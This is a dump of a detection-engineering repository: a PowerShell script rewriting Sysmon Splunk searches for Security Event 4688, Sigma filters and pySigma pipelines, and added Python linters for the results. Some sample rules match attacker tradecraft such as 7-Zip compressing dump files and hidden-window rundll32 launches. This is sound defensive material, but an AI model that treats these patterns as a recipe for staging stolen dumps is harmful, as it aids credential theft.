        Copy-Sysmon1-to-4688 -inputFile c:\savedsearches.conf -outputFile c:\4688\savedsearches.conf


    .NOTES
        Updated: 2024-08-29

        Contributing Authors:
            Anthony Phipps

        LEGAL: Copyright (C) 2024
        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program. If not, see .

    .LINK

    #>

    [CmdletBinding()]
    param(
        [Parameter()]
        [String] $inputFile = ".\savedsearches.conf",

        [Parameter()]
        [String] $outputFile = ".\savedsearches_4688.conf"
    )

    begin{

        $DateScanned = ((Get-Date).ToUniversalTime()).ToString("yyyy-MM-dd HH:mm:ssZ")
        Write-Information -InformationAction Continue -MessageData ("Started at {0}" -f $DateScanned)

        $stopwatch = New-Object System.Diagnostics.Stopwatch
        $stopwatch.Start()
    }

    process{

        # Define the string to search for. The trailing space keeps "EventID=1 " from also matching EventID=10, 11, ...
        $searchString = "EventID=1 "

        # Initialize a dynamic array (ArrayList) to hold the last two lines:
        # the [stanza] header and the description line that precede each search line
        $lineBuffer = New-Object System.Collections.ArrayList

        # Clear or create the output file (Out-Null discards the FileInfo object New-Item emits)
        New-Item -Path $outputFile -ItemType File -Force | Out-Null

        # Read the input file line by line
        Get-Content $inputFile | ForEach-Object {
            $currentLine = $_

            # Check if the current line contains the search string
            if ($currentLine -match $searchString) {
                # Write the last two lines and the current line to the output file
                foreach ($line in $lineBuffer) {
                    Add-Content -Path $outputFile -Value $line
                }
                Add-Content -Path $outputFile -Value $currentLine
            }

            # Update the line buffer with the last two lines
            if ($lineBuffer.Count -ge 2) {
                $lineBuffer.RemoveAt(0)
            }
            $lineBuffer.Add($currentLine) | Out-Null
        }

        # Replace values to match Security Log 4688.
        # -creplace is case-sensitive; the default -replace would also rewrite "image"
        # inside description text, since field names and prose share the same lines.
        (Get-Content $outputFile) | ForEach-Object {
            $line = $_
            # Sysmon channel and event ID become the Security channel and event ID
            $line = $line -creplace 'Channel="Microsoft-Windows-Sysmon/Operational"', 'Channel="Security"'
            $line = $line -creplace 'EventID=1 ', 'EventID=4688 '
            # Field renames; ParentImage must be handled before the bare Image pattern
            $line = $line -creplace 'ParentImage', 'ParentProcessName'
            $line = $line -creplace 'Image', 'NewProcessName'
            # Sysmon-only fields have no 4688 equivalent: drop them, OR-joined variants first
            $line = $line -creplace ' OR OriginalFileName=".*?"', ''
            $line = $line -creplace ' OriginalFileName=".*?"', ''
            $line = $line -creplace ' OR Product=".*?"', ''
            $line = $line -creplace ' Product=".*?"', ''
            $line = $line -creplace ' OR Company=".*?"', ''
            $line = $line -creplace ' Company=".*?"', ''
            $line = $line -creplace ' OR Description=".*?"', ''
            $line = $line -creplace ' Description=".*?"', ''
            $line = $line -creplace ' OR IntegrityLevel=".*?"', ''
            $line = $line -creplace ' IntegrityLevel=".*?"', ''
            $line = $line -creplace ' OR CurrentDirectory=".*?"', ''
            $line = $line -creplace ' CurrentDirectory=".*?"', ''
            # Suffix the stanza name so the copy does not collide with the Sysmon original
            $line = $line -creplace '^\[(.*?)\]$', '[$1 4688]'

            # Return the modified line
            $line
        } | Set-Content $outputFile

    }

    end{

        $elapsed = $stopwatch.Elapsed

        Write-Information -InformationAction Continue -MessageData ("Total time elapsed: {0}" -f $elapsed)
        Write-Information -InformationAction Continue -MessageData ("Ended at {0}" -f ((Get-Date).ToUniversalTime()).ToString("yyyy-MM-dd HH:mm:ssZ"))
    }
}
--------------------------------------------------------------------------------
/sigma/adoption.md:
--------------------------------------------------------------------------------
Download sigma-master
- https://github.com/SigmaHQ/sigma/

Use a script to create a CSV of all the yml files
- https://github.com/TonyPhipps/Powershell/blob/master/Get-FlatYAML.ps1

Import into Power BI, helping you slice the data
- https://app.powerbi.com/
- Determine which category/product/services you are actually collecting, then apply those filters

Optionally, import the MITRE ATT&CK framework
- https://attack.mitre.org/resources/attack-data-and-tools/
- Determine which groups/techniques you care about, and apply an appropriate filter.
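The Copy-Sysmon1-to-4688 script above strips six Sysmon-only fields but passes every other one straight through, and a copied rule that still filters on a field Security 4688 never carries is syntactically valid yet can never fire. The lint below is an added Python example, not repository code: it parses a savedsearches.conf and flags such leftovers (plus a missed Channel/EventID rewrite) in the ` 4688` stanzas. The Sysmon-only field names are taken from the Sysmon Event ID 1 and Security 4688 event schemas; the sample conf is constructed.

```python
"""Lint a savedsearches.conf produced by Copy-Sysmon1-to-4688.

Flags converted (" 4688") stanzas whose search still filters on a field that
exists in Sysmon Event ID 1 but not in Security Event ID 4688: such a rule is
syntactically fine yet can never match. Added example, not repository code.
"""
import re
from typing import Dict, List

# Sysmon Event ID 1 fields with no counterpart in Security 4688. The converter
# strips only the first six; the rest pass through untouched.
SYSMON_ONLY_FIELDS = {
    "OriginalFileName", "Product", "Company", "Description", "IntegrityLevel",
    "CurrentDirectory", "Hashes", "ParentCommandLine", "ParentUser",
    "ProcessGuid", "ParentProcessGuid", "LogonGuid", "FileVersion",
    "RuleName", "UtcTime", "TerminalSessionId",
}

STANZA_RE = re.compile(r"^\[(?P<name>[^\]]+)\]$")
# A field counts as "used" when followed by =, != or IN (...). The leading \b
# keeps substrings apart: ParentCommandLine never registers as CommandLine.
FIELD_USE_RE = re.compile(
    r"\b(" + "|".join(sorted(SYSMON_ONLY_FIELDS)) + r")\s*(?:!?=|\bIN\b)"
)


def parse_stanzas(conf_text: str) -> Dict[str, Dict[str, str]]:
    """Minimal .conf reader: [name] headers followed by key = value lines."""
    stanzas: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = STANZA_RE.match(line)
        if header:
            current = header.group("name")
            stanzas[current] = {}
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            stanzas[current][key.strip()] = value.strip()
    return stanzas


def leaked_sysmon_fields(search: str) -> List[str]:
    """Sysmon-only fields the SPL still filters on, in order of first appearance."""
    found: List[str] = []
    for match in FIELD_USE_RE.finditer(search):
        if match.group(1) not in found:
            found.append(match.group(1))
    return found


def lint_converted(conf_text: str) -> Dict[str, List[str]]:
    """Problems per converted stanza (names ending in ' 4688'); clean ones are omitted."""
    findings: Dict[str, List[str]] = {}
    for name, keys in parse_stanzas(conf_text).items():
        if not name.endswith(" 4688"):
            continue
        search = keys.get("search", "")
        problems = [f"sysmon-only field: {f}" for f in leaked_sysmon_fields(search)]
        if 'Channel="Security"' not in search:
            problems.append('missing Channel="Security"')
        if "EventID=4688" not in search:
            problems.append("missing EventID=4688")
        if problems:
            findings[name] = problems
    return findings


# Constructed sample of converter output: one clean copy, one that leaked
# Sysmon-only fields, one whose EventID was never rewritten, and an original.
SAMPLE_CONF = r"""
[7Zip Compressing Dump Files 4688]
description = Detects 7zip compressing dump files
search = index=evtx Channel="Security" EventID=4688 NewProcessName="*\\7z.exe" CommandLine="*.dmp*" | collect index=notable_events

[Renamed Binary Execution 4688]
description = Constructed stanza still carrying Sysmon-only fields
search = index=evtx Channel="Security" EventID=4688 NewProcessName="*\\rundll32.exe" Hashes="*IMPHASH=*" ParentCommandLine="*-w hidden*" | collect index=notable_events

[Half Converted Rule 4688]
description = Constructed stanza where EventID=1 survived the rewrite
search = index=evtx Channel="Security" EventID=1 NewProcessName="*\\wscript.exe"

[Untouched Sysmon Rule]
description = Original Sysmon stanza, not a 4688 copy, so not checked
search = index=evtx Channel="Microsoft-Windows-Sysmon/Operational" EventID=1 Image="*\\rundll32.exe"
"""

if __name__ == "__main__":
    for stanza, problems in lint_converted(SAMPLE_CONF).items():
        print(f"{stanza}: {'; '.join(problems)}")
```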
--------------------------------------------------------------------------------
/sigma/filters/test_filter1.yml:
--------------------------------------------------------------------------------
title: "yourindex-* Rules"
description: "Rules that will go to yourindex-* but not yourindex-c"
logsource:
  category: process_creation
  product: windows
filter:
  rules:
    - ec570e53-4c76-45a9-804d-dc3f355ff7a7 # 7Zip Compressing Dump Files
  include:
    index: "yourindex-*"
  exclude:
    index: "yourindex-c"
  condition: include and not exclude
--------------------------------------------------------------------------------
/sigma/filters/test_filter2.yml:
--------------------------------------------------------------------------------
title: "yourstuff-b Rules Excluded"
description: "Rules that do NOT apply to yourstuff-b"
logsource:
  product: windows
filter:
  rules:
    - ec570e53-4c76-45a9-804d-dc3f355ff7a7 # 7Zip Compressing Dump Files
  exclude:
    index: "yourstuff-b"
  # the filter condition is ANDed onto each rule's condition, so "not" is required to exclude the index
  condition: not exclude
--------------------------------------------------------------------------------
/sigma/pipelines/cloudtrail.yml:
--------------------------------------------------------------------------------
name: Splunk Alert stanza Postprocessing
priority: 20
postprocessing:
  - type: template
    template: |+
      [{{ rule.title }}]
      description = {{ rule.description | replace('\n', ' ') }}
      search = index=cloudtrail _index_earliest=-1h@h {{ query | replace('\n', '\\\n')}} | fields - _raw | collect index=notable_events source="{{ rule.title }}" marker="guid={{ rule.id }},{% for t in rule.tags %}tags={{ t }},{% endfor %}"
    rule_conditions:
      - type: logsource
        product: aws
        service: cloudtrail


finalizers:
  - type: template
    template: |
      [default]
      cron_schedule = */30 * * * *
      dispatch.earliest_time = 0
      dispatch.latest_time = now
      enableSched = 0
      schedule_window = auto
      {{ queries | join('\n') }}
--------------------------------------------------------------------------------
/sigma/pipelines/linux_builtin.yml:
--------------------------------------------------------------------------------
name: Splunk Alert stanza Postprocessing
priority: 20
postprocessing:
  - type: template
    template: |+
      [{{ rule.title }}]
      description = {{ rule.description | replace('\n', ' ') }}
      search = index=syslog _index_earliest=-1h@h {{ query | replace('\n', '\\\n')}} | collect index=notable_events source="{{ rule.title }}" marker="guid={{ rule.id }},{% for t in rule.tags %}tags={{ t }},{% endfor %}"
    rule_conditions:
      - type: logsource
        product: linux


finalizers:
  - type: template
    template: |
      [default]
      cron_schedule = */30 * * * *
      dispatch.earliest_time = 0
      dispatch.latest_time = now
      enableSched = 0
      schedule_window = auto
      {{ queries | join('\n') }}
--------------------------------------------------------------------------------
/sigma/pipelines/webserver_generic.yml:
--------------------------------------------------------------------------------
name: Splunk Alert stanza Postprocessing
priority: 20
postprocessing:
  - type: template
    template: |+
      [{{ rule.title }}]
      description = {{ rule.description | replace('\n', ' ') }}
      search = index=syslog _index_earliest=-1h@h {{ query | replace('\n', '\\\n')}} | collect index=notable_events source="{{ rule.title }}" marker="guid={{ rule.id }},{% for t in rule.tags %}tags={{ t }},{% endfor %}"
    rule_conditions:
      - type: logsource
        category: webserver


finalizers:
  - type: template
    template: |
      [default]
      cron_schedule = */30 * * * *
      dispatch.earliest_time = 0
      dispatch.latest_time = now
      enableSched = 0
      schedule_window = auto
      {{ queries | join('\n') }}
--------------------------------------------------------------------------------
/sigma/pipelines/windows.yml:
--------------------------------------------------------------------------------
name: Splunk Alert stanza Windows
priority: 20
postprocessing:
  - type: template
    template: |+
      [{{ rule.title }}]
      description = {{ rule.description | replace('\n', ' ') }}
      search = index=evtx _index_earliest=-1h@h {{ query | replace('\n', '\\\n')}} | fields - _raw | collect index=notable_events source="{{ rule.title }}" marker="guid={{ rule.id }},{% for t in rule.tags %}tags={{ t }},{% endfor %}"
    rule_conditions:
      - type: logsource
        product: windows

finalizers:
  - type: template
    template: |
      [default]
      cron_schedule = */30 * * * *
      dispatch.earliest_time = 0
      dispatch.latest_time = now
      enableSched = 0
      schedule_window = auto
      {{ queries | join('\n') }}
--------------------------------------------------------------------------------
/sigma/pipelines/windows_sysmon.yml:
--------------------------------------------------------------------------------
name: Windows Sysmon Transforms
priority: 10
# "transformations:" is the list key pySigma expects; without it the items below are not valid pipeline YAML
transformations:
  - id: condition_sysmon_channel
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
    rule_conditions:
      - type: logsource
        product: windows
        service: sysmon

  - id: condition_windows_process_creation
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 1
    rule_conditions:
      - type: logsource
        product: windows
        category: process_creation

  - id: condition_windows_create_remote_thread
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 8
    rule_conditions:
      - type: logsource
        product: windows
        category: create_remote_thread

  - id: condition_windows_create_stream_hash
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 15
    rule_conditions:
      - type: logsource
        product: windows
        category: create_stream_hash

  - id: condition_windows_dns_query
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 22
    rule_conditions:
      - type: logsource
        product: windows
        category: dns_query

  - id: condition_windows_driver_load
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 6
    rule_conditions:
      - type: logsource
        product: windows
        category: driver_load

  - id: condition_windows_file_event
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 11
    rule_conditions:
      - type: logsource
        product: windows
        category: file_event

  - id: condition_windows_file_delete
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID:
        - 23
        - 26
    rule_conditions:
      - type: logsource
        product: windows
        category: file_delete

  - id: condition_windows_image_load
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 7
    rule_conditions:
      - type: logsource
        product: windows
        category: image_load

  - id: condition_windows_network_connection
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 3
    rule_conditions:
      - type: logsource
        product: windows
        category: network_connection

  - id: condition_windows_pipe_created
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 17
    rule_conditions:
      - type: logsource
        product: windows
        category: pipe_created

  - id: condition_windows_process_access
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 10
    rule_conditions:
      - type: logsource
        product: windows
        category: process_access

  - id: condition_windows_process_tampering
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 25
    rule_conditions:
      - type: logsource
        product: windows
        category: process_tampering

  - id: condition_windows_raw_access_thread
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 9
    rule_conditions:
      - type: logsource
        product: windows
        category: raw_access_thread

  - id: condition_windows_registry_add
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 12
    rule_conditions:
      - type: logsource
        product: windows
        category: registry_add

  - id: condition_windows_registry_delete
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 12
    rule_conditions:
      - type: logsource
        product: windows
        category: registry_delete

  - id: condition_windows_registry_event
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID:
        - 12
        - 13
    rule_conditions:
      - type: logsource
        product: windows
        category: registry_event

  - id: condition_windows_registry_set
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID: 13
    rule_conditions:
      - type: logsource
        product: windows
        category: registry_set

  - id: condition_windows_wmi_event
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-Sysmon/Operational"
      EventID:
        - 19
        - 20
        - 21
    rule_conditions:
      - type: logsource
        product: windows
        category: wmi_event

  - id: Windows Placeholders Management
    type: query_expression_placeholders
    include:
      - "domain_admin"
      - "Administrator"
    expression: "`placeholder_{id}({field})`"
    rule_conditions:
      - type: logsource
        product: windows

--------------------------------------------------------------------------------
/sigma/pipelines/windows_xml.yml:
--------------------------------------------------------------------------------
name: Windows Transforms
priority: 10
transformations:
  - id: field_mapping_windows
    type: field_name_mapping
    mapping:
      Provider_Name: "etw_provider"
    rule_conditions:
      - type: logsource
        product: windows

  - id: condition_system_channel
    type: add_condition
    conditions:
      Channel: System
    rule_conditions:
      - type: logsource
        product: windows
        service: system

  - id: condition_security_channel
    type: add_condition
    conditions:
      Channel: Security
    rule_conditions:
      - type: logsource
        product: windows
        service: security

  - id: condition_psclassic
    type: add_condition
    conditions:
      Channel: "Windows PowerShell"
    rule_conditions:
      - type: logsource
        product: windows
        category: ps_classic_provider_start

  - id: condition_psclassic2
    type: add_condition
    conditions:
      Channel: "Windows PowerShell"
    rule_conditions:
      - type: logsource
        product: windows
        category: ps_classic_start

  - id: condition_psclassic3
    type: add_condition
    conditions:
      Channel: "Windows PowerShell"
    rule_conditions:
      - type: logsource
        product: windows
        service: powershell-classic

  - id: condition_ps_module
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-PowerShell/Operational"
      EventID: 4103
    rule_conditions:
      - type: logsource
        product: windows
        category: ps_module

  - id: condition_ps_sbl
    type: add_condition
    conditions:
      Channel: "Microsoft-Windows-PowerShell/Operational"
      EventID: 4104
    rule_conditions:
      - type: logsource
        product: windows
        category: ps_script
--------------------------------------------------------------------------------
/sigma/sigma-splunk-library.md:
--------------------------------------------------------------------------------
# Create a Splunk savedsearches.conf Comprised of the Latest Sigma Rules

Create this Dockerfile
```dockerfile
FROM debian:bookworm

RUN apt update
RUN apt install -y python3 python3-pip pipenv git
RUN pipenv install sigma-cli
RUN pipenv run sigma plugin install splunk
```

Open a prompt
(get or build pipelines)
```sh
mkdir sigma-cli
cd sigma-cli
mkdir pipelines # then copy/paste pipelines here
mkdir output
git clone https://github.com/SigmaHQ/sigma
sudo docker build -t sigma-cli ./
sudo docker run -it --name sigma-cli --rm -v ./output:/mnt/output -v ./sigma/rules/:/mnt/rules -v ./pipelines:/mnt/pipelines sigma-cli:latest pipenv run sigma convert -t splunk -p /mnt/pipelines/evtx2splunk.yml /mnt/rules/windows/ -s -o /mnt/output/savedsearches.conf
```

Copy/paste the `./output/savedsearches.conf` file into `/opt/splunk/etc/apps/YourApp/local/`
--------------------------------------------------------------------------------
/technical-documentation.md:
--------------------------------------------------------------------------------
General guidance for writing technical documentation (procedures, especially).

- Use "Navigate to **X** > **Y** > **Z**" to describe going through a menu system. Bold each level of navigation.
- Use "Select **X**" to describe a menu dropdown. Bold the selection name.
- Use "Click the **X** Button" to describe clicking buttons. Bold the button text.
- Use "Click the **X** Radio Button" to describe selecting radio buttons. Bold the selected radio button text.
- Use "In **X**, type _Y_" for supplying text to a text field. Bold the text field name, _italicize_ the text to be provided.
- Use "Check **X**" to describe adding a checkmark. Bold the checkbox text.
- Avoid numbering images and steps, if possible. Numbers are only needed when heavy back/forward references are required.
- Avoid overuse of images/screenshots. Use them only for steps that are inherently difficult and that an image genuinely clarifies.
--------------------------------------------------------------------------------
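Returning to the add_condition transformations in windows_sysmon.yml and windows_xml.yml: a rule whose logsource matches none of the rule_conditions is converted with no Channel or EventID constraint at all, so the resulting saved search runs against every channel in the index. This added Python example (not the repository's code, and independent of pySigma) re-implements only the logsource-matching rule, that every key a rule_condition names must equal the rule's value, over a transcribed subset of the pipeline entries, and reports which constructed rule logsources fall through uncovered. The `IN (...)` rendering approximates the Splunk backend's list output.

```python
"""Logsource coverage check for the add_condition transformations in
windows_sysmon.yml and windows_xml.yml. Added example, not repository code
and not using pySigma: it re-implements only the logsource matching rule
(every key a rule_condition names must equal the rule's value) over a
transcribed subset of the pipeline entries."""
from typing import Any, Dict, List

SYSMON = "Microsoft-Windows-Sysmon/Operational"

# Subset transcribed from the two pipeline files: id, conditions to add, and
# the logsource rule_condition that must match for them to apply.
PIPELINE: List[Dict[str, Any]] = [
    {"id": "condition_sysmon_channel",
     "conditions": {"Channel": SYSMON},
     "logsource": {"product": "windows", "service": "sysmon"}},
    {"id": "condition_windows_process_creation",
     "conditions": {"Channel": SYSMON, "EventID": 1},
     "logsource": {"product": "windows", "category": "process_creation"}},
    {"id": "condition_windows_file_delete",
     "conditions": {"Channel": SYSMON, "EventID": [23, 26]},
     "logsource": {"product": "windows", "category": "file_delete"}},
    {"id": "condition_windows_wmi_event",
     "conditions": {"Channel": SYSMON, "EventID": [19, 20, 21]},
     "logsource": {"product": "windows", "category": "wmi_event"}},
    {"id": "condition_security_channel",
     "conditions": {"Channel": "Security"},
     "logsource": {"product": "windows", "service": "security"}},
    {"id": "condition_ps_sbl",
     "conditions": {"Channel": "Microsoft-Windows-PowerShell/Operational", "EventID": 4104},
     "logsource": {"product": "windows", "category": "ps_script"}},
]


def logsource_matches(condition: Dict[str, str], rule_logsource: Dict[str, str]) -> bool:
    """pySigma semantics: keys a rule_condition leaves out are wildcards,
    keys it names must equal the rule's logsource value exactly."""
    return all(rule_logsource.get(k) == v for k, v in condition.items())


def applied_conditions(rule_logsource: Dict[str, str], pipeline=PIPELINE) -> Dict[str, Any]:
    """Merge the conditions of every transformation whose rule_conditions match."""
    merged: Dict[str, Any] = {}
    for transformation in pipeline:
        if logsource_matches(transformation["logsource"], rule_logsource):
            merged.update(transformation["conditions"])
    return merged


def render_spl(conditions: Dict[str, Any]) -> str:
    """Approximate the SPL prefix the Splunk backend emits: Field="str",
    Field=1 for numbers, Field IN (a, b) for lists."""
    parts = []
    for field, value in conditions.items():
        if isinstance(value, list):
            parts.append(f"{field} IN ({', '.join(str(v) for v in value)})")
        elif isinstance(value, str):
            parts.append(f'{field}="{value}"')
        else:
            parts.append(f"{field}={value}")
    return " ".join(parts)


def coverage_report(rules, pipeline=PIPELINE) -> Dict[str, str]:
    """Title -> SPL prefix; an empty prefix means the converted search carries
    no Channel/EventID constraint and will run against every channel."""
    return {r["title"]: render_spl(applied_conditions(r["logsource"], pipeline)) for r in rules}


def uncovered(rules, pipeline=PIPELINE) -> List[str]:
    """Titles of rules that no add_condition transformation applies to."""
    return [title for title, spl in coverage_report(rules, pipeline).items() if not spl]


# Constructed rule logsources (not real Sigma rules) spanning covered and uncovered cases.
SAMPLE_RULES = [
    {"title": "proc-create", "logsource": {"product": "windows", "category": "process_creation"}},
    {"title": "file-delete", "logsource": {"product": "windows", "category": "file_delete"}},
    {"title": "security-logon", "logsource": {"product": "windows", "service": "security"}},
    {"title": "file-change", "logsource": {"product": "windows", "category": "file_change"}},
    {"title": "linux-proc", "logsource": {"product": "linux", "category": "process_creation"}},
]

if __name__ == "__main__":
    for title, prefix in coverage_report(SAMPLE_RULES).items():
        print(f"{title:15} {prefix or '<no channel condition: extend the pipeline>'}")
```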